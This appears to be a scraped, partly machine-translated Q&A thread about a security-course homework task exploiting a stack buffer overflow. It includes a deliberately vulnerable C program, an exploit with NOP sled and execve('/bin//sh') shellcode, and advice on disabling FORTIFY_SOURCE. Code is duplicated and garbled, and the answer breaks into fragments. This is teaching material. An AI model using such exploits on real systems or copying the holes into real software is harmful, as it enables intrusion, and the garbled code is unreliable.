C 作为homeowrk的缓冲区溢出
我仍在学习安全类的缓冲区溢出内容,试图利用此应用程序中的漏洞:C 作为homeowrk的缓冲区溢出,c,buffer-overflow,shellcode,stack-smash,fortify-source,C,Buffer Overflow,Shellcode,Stack Smash,Fortify Source,我仍在学习安全类的缓冲区溢出内容,试图利用此应用程序中的漏洞: //vuln.c #include <stdio.h> int bof(char *str) { char buffer[12]; //BO Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[517]; FILE *badf
//vuln.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
int main(int argc, char* argv[])
{
char buffer[517];
char large_string[512];
FILE *badfile;
badfile = fopen("./badfile", "w");
//NOPslide
memset(&buffer,0x90,517);
//BEGIN FILL BUFFER
//from stack_smashing.pdf
long *long_ptr = (long *) large_string;
int i;
for (i = 0; i < 128; i++)
*(long_ptr + i) = (int) buffer;
for (i = 100; i < strlen(code)+100; i++)
large_string[i] = code[i];
strcpy(buffer,large_string);
//END FILL BUFFER
//save buffer to badfile
fwrite(buffer,517,1,badfile);
fclose(badfile);
return 0;
}
//vuln.c
#包括
整型转炉(字符*str)
{
字符缓冲区[12];
//BO漏洞
strcpy(缓冲区,str);
返回1;
}
int main(int argc,char*argv[])
{
char-str[517];
文件*坏文件;
badfile=fopen(“badfile”、“r”);
fread(str,sizeof(char),517,badfile);
转炉;
printf(“正确返回\n”);
返回1;
}
//vuln.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
int main(int argc, char* argv[])
{
char buffer[517];
char large_string[512];
FILE *badfile;
badfile = fopen("./badfile", "w");
//NOPslide
memset(&buffer,0x90,517);
//BEGIN FILL BUFFER
//from stack_smashing.pdf
long *long_ptr = (long *) large_string;
int i;
for (i = 0; i < 128; i++)
*(long_ptr + i) = (int) buffer;
for (i = 100; i < strlen(code)+100; i++)
large_string[i] = code[i];
strcpy(buffer,large_string);
//END FILL BUFFER
//save buffer to badfile
fwrite(buffer,517,1,badfile);
fclose(badfile);
return 0;
}
//exploit.c
#包括
#包括
#包括
常量字符代码[]=
“\x31\xc0”
“\x50”
“\x68”“/sh”
“\x68”“/bin”
“\x89\xe3”
“\x50”
“\x53”
“\x89\xe1”
“\x99”
“\xb0\x0b”
“\xcd\x80”
;
int main(int argc,char*argv[])
{
字符缓冲区[517];
字符大_字符串[512];
文件*坏文件;
badfile=fopen(“./badfile”,“w”);
//无幻灯片
内存集(&buffer,0x90517);
//开始填充缓冲区
//来自stack_smashing.pdf
long*long_ptr=(long*)大_字符串;
int i;
对于(i=0;i<128;i++)
*(long_ptr+i)=(int)缓冲区;
对于(i=100;i出于某种原因,当我通过运行漏洞攻击创建坏文件时,它不会向它推送任何东西。缓冲区为空或写入不正确。我似乎找不到我的错误,在不知疲倦的谷歌搜索之后,我没能找到足够的答案。根据我对所使用的填充缓冲区代码的理解,这应该用缓冲区的地址填充long_字符串,然后将外壳代码放在long_字符串的开头(在一段NOOP幻灯片之后),然后将long_字符串复制回缓冲区。我真的看不出这或这本书有什么问题。建议?代码中缺少一件非常重要的事情。我会让你自己去发现,但我可能会帮助你看一个非常简单的缓冲区溢出问题,我以前解决过这个问题 将此视为具有漏洞的目标代码-易缓冲区溢出
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int foo(char *arg)
{
char buf[200];
strcpy(buf, arg);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target1: argc != 2\n");
exit(EXIT_FAILURE);
}
foo(argv[1]);
return 0;
}
不管你是否接受stdin的大字符串,写这篇文章都是不好的做法。好吧,你需要了解粉碎堆栈的真正效果。它基本上粉碎了许多值并覆盖了一个特定的地址,该地址基本上是堆栈上返回指针的地址(
$ebp+4memcpystrcpyabort()要禁用FORTIFY_SOURCE进行测试,您应该使用
-U_-FORTIFY_SOURCE-D_-FORTIFY_SOURCE=0badfile-fopen(“badfile”,“r”)sizeof(long)==4strcpy(buffer,large_string);
strcpy(buffer,large_string);